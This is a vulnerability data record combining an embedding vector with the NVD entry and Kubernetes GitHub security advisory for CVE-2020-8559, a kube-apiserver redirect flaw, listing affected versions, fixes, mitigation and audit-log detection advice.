-0.006463790778070688, 0.001227175584062934, -0.00019222873379476368, -0.005678979679942131, 0.016292095184326172, -0.0048651015385985374, 0.009301464073359966, -0.01530381478369236, 0.0018112420802935958, -0.005228439811617136, 0.009206995368003845, 0.022178176790475845, 0.006038684863597155, -0.0013825027272105217, 0.00024116587883327156, 0.02722131460905075, -0.008850923739373684, 0.018762797117233276, -0.016960637643933296, -0.006507391110062599, -0.02438727580010891, 0.009025326929986477, -0.027105046436190605, -0.005748013965785503, -0.009170661680400372, 0.008974459022283554, -0.01841399073600769, -0.03502582386136055, -0.02001268044114113, -0.015173012390732765, -0.013334520161151886, -0.0037968866527080536, 0.005689879879355431, -0.022744985297322273, -0.003724218811839819, 0.012011968530714512, 0.01787625066936016, -0.023791400715708733, -0.030404159799218178, -0.004287393298000097, -0.007132333237677813, -0.013298186473548412, -0.01764371432363987, 0.0070669325068593025, -0.009359598159790039, -0.019315071403980255, 0.01761464774608612, 0.016495564952492714, -0.005468243267387152, 0.0045126634649932384, -0.016175827011466026, -0.010791150853037834, -0.0023235492408275604, 0.0019783778116106987, -0.0031410607043653727, 0.011234424076974392, -0.011234424076974392, -0.012150037102401257, -0.01581248827278614, -0.021843906491994858, 0.00532290805131197, -0.006841662339866161, 0.007775442209094763, 0.024576211348176003, 0.004160224925726652, 0.007986178621649742, 0.028136927634477615, 0.0051739392802119255, -0.004672531969845295, -0.02027428336441517, 0.00041011825669556856, -0.042670466005802155, -0.013683324679732323, 0.0233117938041687, -0.01922786980867386, -0.021872973069548607, 0.009701135568320751, -0.005530010908842087, 0.01767278090119362, 0.019329603761434555, 0.007680974435061216, 0.012804046273231506, -0.013152850791811943, -0.0016822569305077195, 0.002634203527122736, -0.013973996043205261, 0.029241476207971573, 0.03453168272972107, 0.008850923739373684, 0.015725286677479744, 0.00409119063988328, -0.0003626571560744196, 0.018108787015080452, -0.0110018877312541, 0.01142336055636406, -0.010042673908174038, 0.015681685879826546, 0.011743097566068172, 0.017440244555473328, 0.010231610387563705, -0.011815765872597694, 0.025782493874430656, 0.00232899934053421, -0.009163395501673222, -0.0010218892712146044, 0.004301927052438259, -0.006852562539279461, 0.014940476045012474, 0.00803704559803009, -0.018602928146719933, -0.01207736972719431, -0.0006749011226929724, 0.011997435241937637, 0.016728101298213005, 0.009359598159790039, -0.012600576505064964, 0.005428276024758816, 0.018835464492440224, -0.01129982527345419, 0.037205856293439865, -0.006398389581590891, -0.010435079224407673, 0.0017149574123322964, 0.00149150425568223, 0.009570334106683731, 0.011750364676117897, -0.0020637621637433767, -0.029880952090024948, 0.01656823232769966, -0.00805884599685669, -0.0084076514467597, 0.004915968980640173, -0.022483382374048233, 0.004018522799015045, 0.008770989254117012, -0.004007623065263033, -0.006870729848742485, -0.006035051308572292, -0.025738894939422607, -0.0010763900354504585, 0.0017476577777415514, 0.015638085082173347, 0.01741117797791958, 0.003268229076638818, -0.001234442344866693, 0.005068570841103792, -0.015449149534106255, -0.027090512216091156, 0.00946859922260046, -0.016989704221487045, 0.023762332275509834, 0.014191999100148678, -0.013843193650245667, -0.018719196319580078, -0.011169022880494595, 0.00997000653296709, 0.019765609875321388, 0.010856552049517632, 0.012200904078781605, -0.01231717225164175, 0.009519467130303383, -0.008988992311060429, 0.011474227532744408, 0.011793965473771095, -0.01557995192706585, -0.0017830833094194531, -0.02098642662167549, -0.0033554304391145706, 0.024285539984703064, -0.0009537633741274476, -0.013712392188608646, -0.026814375072717667, -0.004574430640786886, -0.016248494386672974, -0.0097156697884202, -0.018893597647547722, -0.0010582231916487217, -0.019591208547353745, -0.008451252244412899, -0.012273572385311127, 0.007622840348631144, 0.020099882036447525, -0.0006313004996627569, -0.00880732387304306, -0.0064710574224591255, 0.016277560964226723, -0.021378833800554276, 0.016742635518312454, -0.0041892919689416885, 0.033892206847667694, -0.008146047592163086, -0.009788337163627148, -0.025084884837269783, 0.01844305917620659, -0.019373204559087753, 0.01578342169523239, 0.009984539821743965, 0.008225982077419758, -0.004919602070003748, -0.00906166061758995, 0.01919880323112011, 0.0013507106341421604, 0.011466960422694683, 0.00919246207922697, 0.020332418382167816, -0.0012108252849429846, -0.003771452931687236, 0.021073628216981888, -0.004338260740041733, -0.01269504427909851, 0.01050048042088747, 0.005104904994368553, 0.002276315353810787, -0.015609018504619598, -0.008981726132333279, 0.0015396465314552188, -0.003208278212696314, -0.02307925745844841, -0.0042256261222064495, -0.017948918044567108, -0.039821892976760864, 0.004033056553453207, 0.005330174695700407, 0.00446906266734004, 0.01193203404545784, -0.01736757718026638, 0.009599401615560055, 0.015245680697262287, 0.02928507700562477, -0.00792804453521967, -0.003876820905134082, 0.004541730508208275, -0.008727389387786388, -0.01635022833943367, -0.012404373846948147, -0.04028696566820145, 0.024794213473796844, 0.005344708450138569, -0.006841662339866161, -0.024300074204802513, -0.003237345488741994, 0.014664338901638985, 0.014715205878019333, -0.01218637079000473, -0.001985644455999136, -0.012665977701544762, -0.025346487760543823, 0.008465785533189774, 0.012767712585628033, 0.023965802043676376, 0.007622840348631144, 0.017222240567207336, 0.004843301139771938, -0.011743097566068172, -0.038775477558374405, 0.015129412524402142, -0.0018602927448228002, 0.01845759153366089, -0.0014460869133472443, -0.01581248827278614, -0.006776261609047651, -0.021611370146274567, 0.015405549667775631, -0.003671534825116396, 0.0018748262664303184, -0.02435820735991001, 0.007146866992115974, -0.0035007656551897526, -0.014584404416382313, -0.018762797117233276, -0.017992518842220306, 0.01036967895925045, -0.01639382913708687, -0.022715918719768524, -0.001853025984019041, 0.027846256271004677, 0.007935311645269394, -0.018486659973859787, -0.0103769451379776, 0.0009746553259901702, 0.01284037996083498, 0.007862643338739872, 0.017018772661685944, -0.010057207196950912, 0.0016577315982431173, -0.005853381939232349, -0.01714957319200039, -0.010028140619397163, -0.03470608592033386, 0.007266768720000982, 0.014170198701322079, 0.0076010399498045444, -0.020550420507788658, -0.017832649871706963, 0.0047197663225233555, 0.013196451589465141, 0.030287891626358032, -0.013545256108045578, 0.008582053706049919, -0.03165404498577118, 0.01636476255953312, -0.009526733309030533, 0.004421828780323267, 0.0010155308991670609, 0.0103769451379776, -0.011764897964894772, 0.0017712748376652598, -0.02121896483004093, -0.001823050552047789, -0.0012626009993255138, -0.01819598861038685, -0.018573859706521034, -0.029168808832764626, -0.005370141938328743, -0.024576211348176003, 0.0123099060729146, -0.008189648389816284, 0.006936130579560995, -0.004367327783256769, -0.01268777810037136, 0.01062401570379734, 0.013952195644378662, -0.019126133993268013, 0.0012435257667675614, -0.022497914731502533, -0.024823281913995743, 0.011445160023868084, 0.01439546886831522, -0.010202542878687382, -0.0005050403997302055, -0.02254151552915573, -0.005406475625932217, 0.001624122727662325, 0.003090193262323737, 0.00803704559803009, -0.006053218152374029, -0.016001423820853233, -0.012295372784137726, 0.02175670489668846, -0.019358672201633453, -0.002178213791921735, -0.00027227672399021685, 0.009512200020253658, -0.02025975100696087, 0.007383036892861128, -0.006245787721127272, 0.003250062232837081, -0.0008542994619347155, 0.007840842939913273, -0.011139956302940845, 0.014620738103985786, 0.021204430609941483, 0.008015246130526066, 0.002132796449586749, 0.004897802136838436, -0.0062239873223006725, 0.011125423014163971, 0.011190823279321194, -0.003484415588900447, 0.006285754963755608, 0.014061196707189083, -0.031537774950265884, -0.000013007799680053722, 0.015129412524402142, 0.0026432869490236044, 0.005907882936298847, 0.014896875247359276, 0.011692230589687824, -0.006801695562899113, -0.006449257023632526, 0.006151319481432438, 0.005221173167228699, 0.022483382374048233, -0.01480240747332573, -0.02255604974925518, 0.0005327449762262404, -0.011198090389370918, -0.006739927921444178, -0.013923128135502338, -0.0042910268530249596, 0.019053466618061066, 0.013814127072691917, -0.0012853096704930067, -0.02617490105330944, 0.0006521924515254796, 0.010318811051547527, -0.00816058088093996, -0.002501585055142641, -0.03272952511906624, 0.002267231699079275, 0.0013043849030509591, 0.0363919772207737, 0.002127346582710743, -0.0005322907818481326, 0.014875074848532677, -0.0005767997354269028, 0.0011426993878558278, -0.012549709528684616, 0.010551348328590393, -0.0028939906042069197, 0.004312827251851559, 0.005450076423585415, -0.013523456640541553, -0.021146295592188835, 0.02235257998108864, 0.0070705655962228775, 0.01791985146701336, -0.013545256108045578, 0.017076905816793442, 0.01244070753455162, 0.01869012787938118, 0.002721404889598489, 0.004381861537694931, -0.033078331500291824, -0.038223203271627426, -0.00019529440032783896, -0.016451964154839516, 0.0014106613816693425, -0.012135503813624382, -0.02044868655502796, -0.0054864101111888885, 0.014475403353571892, 0.056186653673648834, 0.0077027748338878155, -0.008894524537026882, 0.0027268549893051386, 0.0005654453998431563, -0.002715954789891839, -0.0090689267963171, 0.026610907167196274, 0.00792804453521967, -0.009127060882747173, -0.004912335425615311, 0.005969650112092495, -0.003364513861015439, 0.012164570391178131, -0.00006954524724278599, -0.013399921357631683, 0.0007680066046305001, 0.011387025937438011, 0.005210272967815399, 0.012273572385311127, 0.0272503811866045, 0.0037006018683314323, -0.0009664802346378565, -0.00895992573350668, -0.012760445475578308, 0.003317279741168022, -0.007622840348631144, 0.0025978698395192623, 0.0017948917811736465, -0.026625439524650574, 0.0036751681473106146, -0.006387489382177591, 0.012447974644601345, 0.003324546618387103, -0.029939087107777596, -0.009664801880717278, -0.005010436754673719, -0.007840842939913273, -0.00771730812266469, 0.010456879623234272, 0.005726213566958904, 0.011132689192891121, 0.0036570013035088778, 0.014162931591272354, -0.006645459681749344, 0.01012260839343071, -0.0012117336736992002, 0.01309471670538187, 0.004160224925726652, -0.024212872609496117, -0.024053003638982773, 0.0038949879817664623, -0.004247426055371761, -0.029372278600931168, -0.026770776137709618, -0.001574163674376905, -0.024474475532770157, -0.013639724813401699, -0.015245680697262287, 0.009962739422917366, 0.005758914165198803, 0.012215438298881054, 0.03354340419173241, 0.006205820478498936, -0.001032789470627904, -0.00051139882998541, 0.00984647125005722, -0.018079720437526703, -0.0017540162662044168, -0.012506108731031418, -0.013152850791811943, -0.026887044310569763, -0.019344137981534004, -0.010420545935630798, 0.0014806040562689304, 0.010442346334457397, 0.024765146896243095, 0.009984539821743965, 0.000917883706279099, -0.010507747530937195, -0.009286929853260517, 0.009948206134140491, 0.016684500500559807, -0.008981726132333279, -0.015100345015525818, -0.022221777588129044, -0.0010918319458141923, 0.010180742479860783, 0.011060021817684174, 0.0027032378129661083, -0.00974473636597395, 0.009018059819936752, 0.0049268691800534725, 0.02044868655502796, 0.004192925523966551, 0.010638548992574215, 0.01543461624532938, -0.0013116516638547182, -0.008945392444729805, -0.013145584613084793, -0.0027849890757352114, 0.01664089970290661, 0.0011735830921679735, 0.0048687350936234, -0.005646279081702232, 0.011488760821521282, 0.009236062876880169, 0.005530010908842087, -0.012368040159344673, 0.0017712748376652598, 0.013574323616921902, 0.010936486534774303, -0.023776866495609283, -0.022134575992822647, 0.0034299148246645927, -0.006743561010807753, 0.0009637551847845316, -0.009323264472186565, 0.01765824668109417, -0.002770455554127693, 0.022715918719768524, -0.013487122021615505, -0.0018966265488415956, 0.004316460341215134, 0.002352616284042597, 0.004483595956116915, 0.0033009296748787165, 0.00986827164888382, -0.017585579305887222, -0.0110018877312541, -0.025753427296876907, -0.003956755623221397, 0.021974708884954453, -0.005035870708525181, -0.014191999100148678, 0.015667153522372246, -0.02982281893491745, 0.0025124852545559406, 0.020332418382167816, 0.000060859187215100974, 0.008974459022283554, 0.010282477363944054, -0.021088162437081337, -0.00654372526332736, -0.025738894939422607, -0.004730666521936655, 0.005584511440247297, 0.010791150853037834, -0.011546894907951355, -0.011067287996411324, -0.016786234453320503, 0.00868378859013319, 0.011016421020030975, -0.01819598861038685, -0.004654365126043558, -0.0033717805054038763, -0.0010745733743533492, -0.01839945837855339, 0.014431802555918694, 0.003302746219560504, 0.019576674327254295, 0.01659729890525341, -0.037787195295095444, 0.002741388510912657, 0.006478324066847563, -0.0019947278779000044, 0.01414839830249548, 0.011517828330397606, 0.006347522139549255, -0.010020873509347439, 0.009650268591940403, 0.007226801477372646, -0.0012707761488854885, -0.0026505538262426853, 0.014853274449706078, 0.007484771776944399, -0.016175827011466026, 0.002559719141572714, 0.0005300199263729155, -0.0002604682231321931, 0.015986891463398933, 0.016684500500559807, 0.00919246207922697, -0.02386406809091568, -0.011125423014163971, -0.010820218361914158, -0.008116980083286762, 0.015085811726748943, -0.006525557953864336, -0.007615573238581419, -0.028093326836824417, -0.003949488513171673, 0.015143945813179016, 0.024009402841329575, 0.028689201921224594, 0.017585579305887222, -0.009759270586073399, -0.029750149697065353, -0.01789078488945961, -0.007125066593289375, 0.01167769730091095, -0.018210522830486298, 0.004661632236093283, 0.003422647947445512, 0.003840487217530608, -0.0005777081241831183, 0.005929683335125446, -0.02493955008685589, 0.005740747321397066, 0.02492501586675644, 0.012636910192668438, -0.007891710847616196, -0.002138246549293399, 0.023660598322749138, 0.008400384336709976, -0.002247248077765107, -0.017454778775572777, 0.04043230041861534, 0.006383856292814016, -0.022265378385782242, 0.005827948451042175, -0.023718733340501785, 0.0017494745552539825, -0.014620738103985786, -0.0027777221985161304, -0.00024616176960989833, 0.010558614507317543, -0.000041471674194326624, 0.005595411639660597, 0.0032954795751720667, 0.012397106736898422, -0.003924055024981499, -0.012738645076751709, 0.011052754707634449, 0.019896412268280983, -0.0015251130098477006, 0.013923128135502338, 0.028863605111837387, -0.008247782476246357, 0.0029702915344387293, 0.010035407729446888, 0.017730915918946266, 0.013174651190638542, -0.011612296104431152, -0.0070305983535945415, 0.011706763878464699, 0.0012635093880817294, -0.0007966195116750896, -0.006347522139549255, 0.01896626502275467, 0.027105046436190605, 0.007404837291687727, 0.013000248931348324, 0.00042964768363162875, -0.007441170979291201, -0.013857727870345116, -0.000015910249203443527, -0.003402664326131344, -0.013210984878242016, -0.006816228851675987, 0.0034480816684663296, 0.021843906491994858, -0.00680896220728755, 0.0036261174827814102, 0.02486688271164894, 0.009410465136170387, -0.009236062876880169, -0.010980087332427502, -0.014628005214035511, -0.011270757764577866, 0.00931599736213684, 0.010936486534774303, 0.011815765872597694, 0.007949844934046268, -0.0004643919237423688, -0.008276849053800106, 0.015071277506649494, 0.002808606019243598, -0.016292095184326172, 0.018355857580900192, -0.014489936642348766, -0.007840842939913273, 0.0050322371535003185, 0.006351155694574118, -0.009897339157760143, -0.005740747321397066, -0.0019093434093520045, -0.0049704695120453835, -0.00035266534541733563, -0.020027214661240578, -0.0015977807343006134, -0.009512200020253658, 0.006176753435283899, 0.0012308089062571526, -0.0012262671953067183, 0.005548177752643824, 0.0058097816072404385, -0.0181669220328331, 0.006976097822189331, 0.00895992573350668, -0.00016316166147589684, 0.0016622733091935515, -0.012804046273231506, -0.015521817840635777, 0.002579702762886882, -0.024750612676143646, 0.018806396052241325, -0.011183557100594044, -0.020056281238794327, -0.010921953245997429, 0.003931321669369936, 0.01713504083454609, -0.008800056762993336, 0.0029194243252277374, -0.031247105449438095, 0.026392903178930283, 0.014082997106015682, 0.007935311645269394, 0.004839668050408363, 0.003270045854151249, -0.011510561220347881, 0.0025361021980643272, 0.01789078488945961, 0.005464609712362289, -0.008247782476246357, 0.004054856952279806, 0.0047851670533418655, 0.0007080557406879961, -0.02252698317170143, -0.0056680794805288315, -0.010137141682207584, 0.0021636802703142166, -0.003529832698404789, 0.013719659298658371, 0.008930858224630356, -0.003960388712584972, 0.013530722819268703, 0.009301464073359966, -0.021146295592188835, -0.023398995399475098, 0.0031210770830512047, -0.015231146477162838, 0.010166209191083908, 0.005479143466800451, -0.006111352238804102, -0.00421472592279315, 0.001745841116644442, -0.016786234453320503, 0.004465429112315178, 0.005857015494257212, 0.0016368395881727338, -0.0011009154841303825, 0.02434367500245571, 0.02879093773663044, 0.013312719762325287, 0.000491415208671242, -0.004901435226202011, -0.002941224491223693, 0.000207670615054667, -0.01970747672021389, -0.005402842536568642, -0.013131050392985344, 0.012833112850785255, -0.015042210929095745, 0.008022512309253216, 0.0047597335651516914, -0.007753641810268164, -0.012651444412767887, 0.02934321202337742, -0.007397570181638002, 0.015114878304302692, -0.004694332368671894, 0.008625654503703117, -0.008000711910426617, -0.009039860218763351, -0.010812951251864433, -0.005155772436410189, -0.0007371228421106935, -0.0032409788109362125, 0.015361948870122433, -0.0031319772824645042, 0.019140668213367462, 0.013421721756458282, -0.013610657304525375, 0.002636020304635167, 0.017759982496500015, 0.006024151109158993, -0.006877996493130922, 0.005758914165198803, 0.00896719191223383, -0.007310369051992893, 0.025361021980643272, -0.003142877481877804, 0.01090015284717083, 0.009432265534996986, 0.006085918750613928, 0.0009891889058053493, -0.0013734193053096533, -0.0032409788109362125, -0.004400028381496668, -0.00961393490433693, -0.011067287996411324, -0.0073176356963813305, 0.03429914638400078, 0.0038622873835265636, 0.003993089310824871, 0.0068198624067008495, 0.014489936642348766, 0.020361484959721565, 0.005995084065943956, 0.004955936223268509, -0.019329603761434555, 0.014090264216065407, 0.006638193037360907, -0.02438727580010891, -0.002556085819378495, 0.0014079364482313395, 0.016989704221487045, -0.012854913249611855, 0.011161756701767445, -0.005548177752643824, -0.005606311839073896, -0.018748262897133827, 0.00158597226254642, 0.004661632236093283, 0.023660598322749138, 0.015449149534106255, 0.008523919619619846, 0.010820218361914158, -0.009781070053577423, 0.0031737610697746277, 0.02050682157278061, -0.00019359125872142613, -0.0038223201408982277, -0.01467887219041586, -0.02153870277106762, -0.020870158448815346, -0.006173119880259037, 0.006736294366419315, 0.02178577147424221, -0.012913047336041927, -0.003117443760856986, 0.0002815872721839696, -0.005086738150566816, -0.006391122937202454, -0.009541267529129982, 0.0048651015385985374, 0.012920314446091652, -0.025724360719323158, -0.007404837291687727, 0.0012389840558171272, 0.012346239760518074, 0.01090015284717083, -0.0011426993878558278, -0.006372956093400717, -0.010849284939467907, -0.030665762722492218, 0.020695757120847702, -0.0027595553547143936, 0.004777900408953428, 0.002274498576298356, 0.0015160295879468322, -0.017222240567207336, -0.0014969543553888798, -0.008073380216956139, -0.00564264552667737, -0.005184839479625225, 0.0014578953851014376, 0.030200690031051636, -0.000558632833417505, 0.002100096084177494, 0.011198090389370918, 0.021436966955661774, -0.005152138881385326, -0.009483132511377335, -0.007201367523521185, 0.0012362590059638023, 0.005097638349980116, -0.025753427296876907, -0.01915520243346691, 0.00033858598908409476, -0.008516652509570122, -0.008131514303386211, -0.008131514303386211, -0.012600576505064964, 0.008109713904559612, 0.005384675692766905, 0.025331955403089523, -0.004530830308794975, -0.0019275103695690632, -0.0022363481111824512, -0.0027432050555944443, 0.0103769451379776, 0.0026796208694577217, -0.022381646558642387, 0.002521568676456809, -0.007513838820159435, -0.007386669982224703, -0.0013452605344355106, 0.013428987935185432, -0.02416927181184292, 0.004138424526900053, 0.0097156697884202, 0.012774978764355183, -0.020884692668914795, 0.005649912636727095, 0.02411113865673542, -0.014533537440001965, 0.0233117938041687, -0.008276849053800106, 0.00214006332680583, -0.011873899959027767, -0.014519003219902515, 0.006445623468607664, 0.0021037294063717127, 0.00025706193991936743, 0.029633881524205208, 0.003913154825568199, 0.001920243608765304, -0.022497914731502533, -0.003457165090367198, 0.02800612524151802, -0.0037423858884721994, -0.01841399073600769, -0.009323264472186565, -0.03089829906821251, -0.013843193650245667, -0.004992269910871983, -0.014511737041175365, -0.015928756445646286, -0.004552630707621574, -0.0032355287112295628, 0.015638085082173347, -0.021204430609941483, -0.01608862541615963, 0.010609482415020466, 0.024212872609496117, 0.0032954795751720667, -0.013661525212228298, 0.0069651976227760315, 0.009599401615560055, -0.015129412524402142, 0.04961749538779259, 0.011764897964894772, -0.0005341075011529028, 0.009824670851230621, 0.002005628077313304, 0.0034698820672929287, -0.005686246324330568, -0.00871285516768694, 0.013029315508902073, 0.0008956292294897139, 0.00550094386562705, 0.001424286630935967, -0.004298293497413397, -0.00883639045059681, -0.014744273386895657, -0.00680896220728755, 0.006147686392068863, -0.0022835819981992245, -0.010951019823551178, -0.023747799918055534, -0.01022434327751398, -0.0022617815993726254, 0.015725286677479744, -0.016728101298213005, -0.011248957365751266, 0.006194920279085636, -0.0007430270779877901, -0.012644177302718163, -0.0008043404668569565, 0.013465321622788906, 0.0071068997494876385, -0.020913759246468544, -0.01946040615439415, -0.006729027722030878, 0.002995725255459547, 0.008567520417273045, 0.007986178621649742, 0.01869012787938118, -0.022250846028327942, -0.009424998424947262, 0.003666084725409746, -0.0005695329746231437, -0.00933779776096344, 0.004763366654515266, -0.020099882036447525, 0.012571509927511215, -0.014308267273008823, 0.028921738266944885, 0.040868304669857025, 0.02230897918343544, 0.008473051711916924, 0.00869105476886034, -0.008342250250279903, 0.012978448532521725, 0.0051775723695755005, -0.01841399073600769, 0.013131050392985344, -0.01760011352598667, -0.028325863182544708, -0.024256473407149315, 0.006013250909745693, 0.002534285420551896, -0.021131763234734535, -0.01585608907043934, -0.015260213986039162, -0.002125529805198312, 0.005130338482558727, 0.005624478682875633, 0.005860648583620787, 0.032584190368652344, -0.011212623678147793, -0.009454065933823586, -0.0014597121626138687, -0.007993445731699467, -0.015754353255033493, -0.03691518306732178, 0.003589783562347293, -0.008022512309253216, 0.003956755623221397, -0.007797242607921362, -0.011045488528907299, -0.0048251342959702015, 0.00021402904530987144, 0.00030020836857147515, 0.017309442162513733, -0.012237237766385078, 0.0022908488754183054, -0.0017194991232827306, 0.0031610443256795406, -0.009047126397490501, 0.0246634129434824, 0.007034231908619404, -0.02803519368171692, -0.01684436947107315, 0.01578342169523239, -0.004981369711458683, 0.005406475625932217, -0.000785719370469451, 0.00010758223652374, 0.015638085082173347, 0.012658710591495037, 0.009773803874850273, -0.01916973479092121, -0.0030683930963277817, 0.004182025324553251, -0.00030338758369907737, 0.016466498374938965, -0.006300288252532482, -0.020041747018694878, 0.005224806722253561, 0.004948669578880072, -0.0017394827445968986, -0.005936949979513884, -0.01012260839343071, 0.0033354468178004026, 0.008349517360329628, 0.007492038421332836, -0.012288105674088001, 0.013196451589465141, 0.020666690543293953, -0.014286466874182224, -0.016408363357186317, 0.012636910192668438, -0.00008810956933302805, -0.016190359368920326, -0.005929683335125446, -0.005740747321397066, 0.016161292791366577, 0.023021122440695763, -0.0207974910736084, 0.022120043635368347, -0.00896719191223383, 0.008988992311060429, 0.006729027722030878, 0.021335233002901077, 0.01100915390998125, -0.0027268549893051386, 0.019780144095420837, 0.003927688580006361, 0.021654970943927765, 0.004530830308794975, 0.04360061138868332, 0.007986178621649742, 0.007826309651136398, -0.018893597647547722, 0.018210522830486298, 0.01103095430880785, -0.006500124465674162, -0.0003576612507458776, 0.007659174036234617, 0.0015332881594076753, 0.012905781157314777, 0.01012260839343071, -0.0016604566480964422, 0.0032609624322503805, 0.018879065290093422, 0.014969543553888798, 0.024314606562256813, -0.034909557551145554, -0.005152138881385326, -0.003934955224394798, 0.02775905653834343, 0.0034008477814495564, -0.004876001738011837, -0.0065764253959059715, 0.003989455755800009, 0.005929683335125446, -0.0015378298703581095, 0.03711865469813347, -0.001835767412558198, -0.0246198121458292, -0.009759270586073399, 0.016001423820853233, -0.013109249994158745, 0.020332418382167816, 0.012571509927511215, 0.01656823232769966, 0.006670893635600805, 0.035926904529333115, 0.000970113615039736, 0.0037750862538814545, 0.02409660443663597, -0.00921426247805357, -0.01129982527345419, 0.026509171351790428, -0.018617460504174232, 0.0013498022453859448, -0.014548070728778839, 0.017977984622120857, 0.01502767764031887, 0.016800768673419952, -0.01103095430880785, 0.013305453583598137, 0.012811312451958656, -0.010108075104653835, 0.03165404498577118, -0.007401203736662865, 0.003397214226424694, 0.006169486325234175, -0.010427813045680523, 0.012360773049294949, -0.01130709145218134, 0.005108538083732128, 0.01334905344992876 ]
CVE-2020-8559
2020-07-22T14:15:16.517000
The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.5, "impactScore": 5.9, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92914" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/JAIGG5yNROs/19nHQ5wkBwAJ" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200810-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "43222A9D-6D48-490F-8120-349DCE1C1218", "versionEndExcluding": null, "versionEndIncluding": "1.15.0", "versionStartExcluding": null, "versionStartIncluding": "1.6.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FE1EA8C5-2EF4-4462-B693-FE20B3DF75C6", "versionEndExcluding": "1.16.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "CC1FA454-87A3-480C-BB5E-A23086E2EA99", "versionEndExcluding": "1.17.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E4009BA-8220-4B8E-8B4B-1ADA1680DD70", "versionEndExcluding": "1.18.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/92914
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact [email protected] #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver
CVE-2020-8559: Privilege escalation from compromised node to cluster
https://api.github.com/repos/kubernetes/kubernetes/issues/92914/comments
7
2020-07-08T17:03:16
2021-12-02T22:54:32Z
https://github.com/kubernetes/kubernetes/issues/92914
653,456,402
92,914
true
